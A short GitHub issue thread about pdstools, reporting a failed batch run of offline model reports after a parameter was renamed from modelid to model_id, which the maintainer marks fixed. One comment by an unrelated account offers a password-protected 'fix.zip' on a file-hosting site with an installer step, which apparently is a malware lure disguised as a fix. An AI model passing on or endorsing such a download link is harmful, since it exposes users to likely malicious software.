### ISSUE TITLE
Batch run of off line model report creation fails

### ISSUE THREAD

**Issue by operdeck** [pegasystems/pega-datascientist-tools#254]
### pdstools version checks

- [X] I have checked that this issue has not already been reported.

- [X] I have confirmed this bug exists on the latest version of pdstools.

### Issue description

Parameter changed from modelid to model_id recently in the python version

### Reproducible example

```R
Errors when calling run_python_model_reports
```

### Expected behavior

No errors

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by operdeck** [comment]
Fixed
